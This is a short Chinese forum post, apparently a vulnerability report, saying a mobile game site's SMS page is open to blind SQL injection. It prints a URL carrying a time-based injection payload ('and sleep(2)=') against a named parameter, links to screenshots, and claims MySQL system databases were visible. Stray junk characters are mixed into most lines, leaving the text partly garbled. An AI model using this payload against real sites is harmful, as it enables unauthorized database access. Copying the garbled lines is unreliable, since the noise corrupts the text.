简要描述:# K' n' K0 Z! N- o
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。" t% l ]; i) n3 x4 c- z' Y% c6 H) A
& U" N$ C2 ~% W+ x
详细说明:
% Z, M' B, V5 q8 S存在SQL盲注url:
5 p$ \. O7 l! U: t; W7 {. S5 N$ T/ Pfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1# G; w% d, ~; I+ D+ R
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
1 _/ o" b% o, P5 t4 q, d; Nhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png$ F8 z4 q4 {7 c
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
z3 Z n5 F3 u; x9 C( r+ i5 U7 }1 H, m+ {: Q. V p( P
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对